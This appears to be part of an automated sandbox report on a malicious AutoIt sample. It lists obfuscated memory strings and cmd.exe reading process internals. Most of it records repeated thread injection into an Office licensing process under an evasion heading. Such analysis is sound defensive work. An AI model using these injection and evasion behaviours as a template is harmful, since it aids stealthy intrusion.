            Source: Autoit3.exeBinary or memory string: +sIGhDJxZUVM1sqLmrzSLYo/XwaPj9IFkgc81cqEMU36wgaEPHFlRUzWyouKsi2KP18Gg7+P0gcSBbzVytQxTfrCBtQ+cWVFTNbK27qyP1o/XwaDv4/SBZIHPNXKhDFN+sIGhDhxZUVM1sqKmrzSLYo/XwaP4gR/ggc81cqEMU36wgaEOnFlRUzWyov6sg7qMi6KMg7qci6Kfw9mmjqyBr/iBH+CBzzVyoQxTfrCBoQ0sXVFQg7qMi6KPNbKivq/D2aa
            Source: Autoit3.exeBinary or memory string: FdArCCoQwqrq6sgqEM9TlRUL2vfRSCoQ3RfVFTw9mj+IEf6+CBzJv5XIO6jIOtXEq+rq6tDeUNUVCD+V6QEeCDuoyDrV0Pyr6ur8PL2aDv+IEf4IPajKGhXQJAgqEMuQ1RUr1WHqNisIKhDl6urqyCoEaqrq6tDg6+rq0CsIKhDaKqrqyCoQ7dOVFQva99FIKhDzl9UVCCoQ6FOVFQva98RIKhD+F9UVPD2aP4gRyhvU5h5Iv5TIu5XmGv+w/AU6qvPV
            Source: Autoit3.exeBinary or memory string: r/iBH+CBzzVyoQxTfrCBoQxcXVFQg7qMi6KMg7qci6KfNbKiuq/D2aaOrIGv+IEf4IHPNXKhDFN+sIGhDOxdUVCDuoyLooyDupyLop81sqK2r8PZpo6sga/4gR/ggc81cqEMU36wgaEPPF1RUIO6jIuijIO6nIuinzWyorKvw9mmjqyBr+P0gcSBbzVytQxTfrCBtQ5MXVFTNbK2gqytQql6wa80i7aP18Ggga/tDMRdUVPPNbKuuq3bzozBoJuur+0M
            Source: Autoit3.exeBinary or memory string: F1RU881sq6yrdvOjMGgm66v7Q9kXVFTzzWyrrat006MwaCbrq/j9IFkgc81cqEMU36wgaEN/EFRUmGsi6KPNbKirqibooyB9Q09XVVT18Gg7+P0gWSBzzVyoQxTfrCBoQwMQVFSYayLoo81sqKOrJuij+xJUVFTUEaqrq6sgbUOCrVRU9fBoIGv4/SBZIHPNXKhDFN+sIGhD2xBUVJhrIuijzWyopqsm6KMgfUOrslRU9fBoO/j9IFkgc81cqEMU36wg
            Source: Autoit3.exeBinary or memory string: SBtQ3awVFQgYxGv7eqrIK+PQ1laVVQva96nzSCozRGiq0NhHVRU8fXwaKurq6+pq6urq6trq6urq6ur7fj9/CByIFkgU81crEMU36wgbEOuFVRUK5bHyO2rq9+7pBVozSCv7ivI7avNIqxArs1srKirItyj9PXwaPj9IFkgc81cqEMU36wgaENnFlRUzWyoqKsi2KP18Gg7+P0gcSBbzVytQxTfrCBtQwcWVFTNbK26qyP1o/XwaDv4/SBZIHPNXKhDF
            Source: Autoit3.exeBinary or memory string: MVFRDe1JUVPT18CBO9mg7QwSrq6toIGv4/fz6IFkgc81cqEMU36wgaEN1V1RUzSCVzShUv9il/fhD6UxUVEM+UlRUQNLNKlSrqt68zWyoq6qYayLooybooyD9o0NkllRUQPDNKlSqqt64zSKQIO2jIuijIGhUvo+j7KtA6s1cbKuL37sSn6zqqyB9IGhDNVZUVECBIH8gbEOI7KurL2vfusGrIGUgeCDvj68gs1T4g0Cn/fhDbE1UVEOxUlRU8fT18Gg
            Source: Autoit3.exeBinary or memory string: +P0gcSBbkFjfnc1cqEMU3o3NXK1DFN+sIG1DgldUVCCoIq0g6K8i7a8g6KMi7aMg6Kci7adAoiB4IG1Dv1RUVPXwaDv+IEcob1v4/fwgUiBZIHMm7lv7Q/tNVFSYa/7DI6Pqq89Um88iiyB9Ju5bQydUVFQm7ltUvouj7KukHGQm/lsgaEPpqaurmGvx8vLPIrvDJKPqqybuW0OOV1RUaEJEnlRUQFv09fAgTvZoIGv+IEfBq/ggc5hr/sN9o+qrz1Sb
            Source: Autoit3.exe, 00000008.00000002.565947520.0000000001213000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614013393.00000000033C8000.00000004.00000020.00020000.00000000.sdmp, SciTE.exe, 00000018.00000002.812058550.00000000006FA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_00450514 mov eax, dword ptr fs:[00000030h]9_2_00450514
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_00458B34 mov eax, dword ptr fs:[00000030h]9_2_00458B34
            Source: C:\ProgramData\fkeabad\Autoit3.exeMemory protected: page write copy | page execute | page execute read | page execute and read and write | page execute and write copy | page guard | page no cache | page write combineJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Creates a thread in another existing process (thread injection)
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: FF0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 11A0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 11E0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 1260000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 12A0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 12E0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 1320000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 2FA0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 2FE0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3020000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3060000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 30A0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 30E0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3120000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3160000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 31A0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 31E0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3220000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3260000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 32A0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 32E0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3320000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3360000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 33A0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 33E0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3420000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3460000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 34A0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 34E0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3520000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3560000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 35A0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 35E0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3620000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3660000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 36A0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 36E0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3720000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3760000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3790000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3910000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3950000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3990000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 39D0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3A00000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3B80000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3BC0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3C00000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3C30000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3DB0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3DF0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3E30000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3E60000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 3FE0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4020000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4060000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 40A0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 40D0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4250000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4290000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 42C0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4440000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4480000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 44C0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4500000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4540000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4580000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 45C0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4600000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4640000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4680000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 46C0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4700000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4740000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4780000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 47C0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4800000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4840000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4880000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 48C0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4900000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4940000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4980000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 49C0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4A00000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4A40000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4A80000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4AC0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4B00000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4B40000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4B80000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4BC0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4C00000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4C40000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4C80000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4CC0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4D00000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4D40000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4D80000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4DC0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4E00000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4E40000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4E80000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4EC0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4F00000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4F40000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4F80000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 4FC0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5000000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5040000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5080000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 50C0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5100000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5140000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5180000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 51C0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5200000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5240000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5280000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 52C0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5300000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5340000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5380000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 53C0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5400000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5440000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5480000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 54C0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5500000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5540000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5580000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 55C0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5600000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5640000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5680000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 56C0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5700000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5740000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5780000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 57C0000Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread created: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe EIP: 5800000Jump to behavior
